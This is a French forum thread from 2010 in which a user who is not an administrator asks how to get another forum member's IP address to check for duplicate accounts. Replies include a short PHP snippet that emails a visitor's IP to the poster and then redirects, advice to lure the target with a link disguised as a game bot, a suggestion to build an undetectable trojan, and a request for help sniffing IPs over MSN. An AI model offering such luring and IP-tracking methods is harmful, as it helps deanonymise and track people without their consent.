Se connecter avec
S'enregistrer | Connectez-vous
Votre question
Fermé

Trouver l'adresse IP d'une personne sur un forum

Dernière réponse : dans Programmation
Partagez
28 Février 2010 14:02:43

Bonjour, voila tout est dit dans le titre Alors pour évité les cas de consiences et les "stp si tu c pas trouvai 1 adress ip joue pa o hacker" je vai vous exposé mon probléme ici.
J'ai l'impression qu'une personne se fout de la gueule de son monde sur un forum phpBB (xooit.fr) et j'aimerai bien comparé les IP pour avoir des certitudes sur ce que j'avance ;
La commande "netstat" peut elle servir dans ce cas ? si oui dans quelles conditions l'utilisé et laquelle exactement ? sinon il y aurait t'il d'autres moyens plus simples ? des idées ? je prend tout je n'en dormirai que moins bête ce soir ;) 
Merci !

Autres pages sur : trouver adresse personne forum

28 Février 2010 14:43:11

Normalement, il doit y avoir quelque chose pour récupérer l'adresse IP que le membre utilise dans l'interface d'administration du forum. Tu veux la comparer avec quoi?
Score
0
28 Février 2010 14:56:00

Salut avant tout merci pour ton aide je voudrai la comparé a l'IP qu'il utilise sur un jeu ! A savoir : http://www.travian.fr/ ("remix" de O-game pour ceux qui connaissent pas)
Bon apré par rapport a ce que tu me dit le problème c'est que je ne suis pas admin :s
Score
0
Contenus similaires
28 Février 2010 15:08:19

Ah, bah c'est sur, là ça ne va pas marcher, surtout si tu n'es admin ni du forum ni du jeu. Tu n'as pas de solution simple pour cela; il faudrait par exemple que tu l'amènes depuis le forum et depuis le jeu à un endroit qui est sous ton contrôle et où tu peux vérifier les IPs (exemple, un site qui t'appartient et dont tu as les logs), mais ça, c'est plus du domaine du social engineering et il n'y a pas de "recette miracle" qui marche à tous les coups.
Score
0
28 Février 2010 15:17:05

Ha ! ... En fait pour que cela fonctionne il faudrai que je pirate le site (c'pas gagner ca xd) ?! ou bien que j'arrive a ouvrir une discution instantanée avec lui ?
Bon je vai prendre des cours d'informatiques et puis .... peut étre que .... je l'aurai un jour je l'aurai !!! :D 
Score
0
1 Mars 2010 16:45:12

Netstat fonctionne seulement si t'es en connexion directe avec lui ! MSN,...

De plus , il a surement une ip dynamique et donc si cela fait plusieurs jours il peut avoir changer d'ip donc tu ne pourras pas comparer grand chose !

Je ne vois pas de solution pour ma part, il faudrait que tu trouves autres choses !
Score
0
1 Mars 2010 17:39:24

C'est simple, pas besoin d'être ingénieur pour faire un petit script qui l'enregistre sur une base de donnée. :)  :)  $_SERVER['REMOTE_ADDR']; (php).
Oui ta besoin de la bdd, pour voir si ce pigeon a bien cliquer, et tu auras son ip.
en + je suis entrain d'en faire un lol. ce qu'il faut faire, tu lui post un lien sur le forum, che pas tu créer une nouvelle discussion et puis balance le lien, dit lui que c'est un bot pour travian et il va tomber ds le piège. ^^ :hello: 
Score
0
1 Mars 2010 17:39:47

si il existe une solution
simple rapide éfficase mais faut que tu fase se que tu a a faire dans les minute qui vienne

$to="aaa@bbb.cc"; // Mettez votre adresse email
mail($to, 'Ip Cible', $_SERVER['REMOTE_ADDR']);
header("Location:http://www.bouzbouz.tz");//Mettez le lien vers la page que votre cible doit voir
?>
Score
0
1 Mars 2010 17:53:02

je ne c'est pas si je les mi je voie pas mes modification

alors voici

$to="aaa@bbb.cc"; // Mettez votre adresse email
mail($to, 'Ip Cible', $_SERVER['REMOTE_ADDR']);
header("Location:http://www.bouzbouz.tz");//Mettez le lien vers la page que votre cible doit voir
?>
Score
0
1 Mars 2010 18:06:40

Cette solution proposer est valable mais pour comparer les adresse ip il faudrait que tu obtiennes les deux, celle que tu auras sur le forum et celle que tu obtiendras dans le jeu mais pour cela il faudrait qu'il se connecte sur les deux dans la même journée pour que t'es une chance d'avoir les deux même adresses ( si c'est bien lui le sujet des tes soupçons ) sauf si il a une adresse ip Fixe!

Sinon une autre solution un peu tordu mais "plus simples" car t'aurais besoin seulement de l'adresse ip du forum !

Je m'explique : Il faudrait que tu récupères l'adresse ip lorsqu'il est connecté au forum ! ensuite si tu peux avoir accès a ces informations du compte de jeu, car souvent il indique dans le formulaire du compte la ville ou il habite ! et la tu fais une localisation de son adresse ip !

et ci celle-ci se trouve dans la même zone géographique (ville ) que celle qui est indiqué dans les informations du compte il y a une forte chance que sa soit lui !!

pour localiser une adresse ip : http://www.localiser-ip.com/
Score
0
1 Mars 2010 18:10:50

ouais sinon te fais pa chier fais un serveur trojan !!

ahaha faut juste savoir comment rendre indetectable tu n'aura plus se souci la après

et il y a pas moyen de l'incoporer au bouton connection du forum?

cela après des contrainte tu reçoit toute les ip mais au moin ta le non de la personne assigniez avec
Score
0
Anonyme
14 Avril 2010 19:40:25

Bonjour je cherche a récuperer l'adresse IP de quelqu'un par msn je sait que c'est plus efficace en connexion directe ( envoi de fichier , cam , micro ... ) cependant , avec la methode Netstat je n'arrive a rien car plusieurs connexion s'affichent etablished ? J'ai téléchargé Wireshark , messenger detect et snif-ip entre autres mais l'utilisitation est un peu complexe . quelqu'un pourrait m'aider pour sniffer l'ip que je recherche avec un de ces logiciels ou avec netstat en m'expliquant comment cibler l'IP en question svp
Merc i d'avaaaance !!!!
Score
0
Tom's guide dans le monde
  • Allemagne
  • Italie
  • Irlande
  • Royaume Uni
  • Etats Unis
Suivre Tom's Guide
Inscrivez-vous à la Newsletter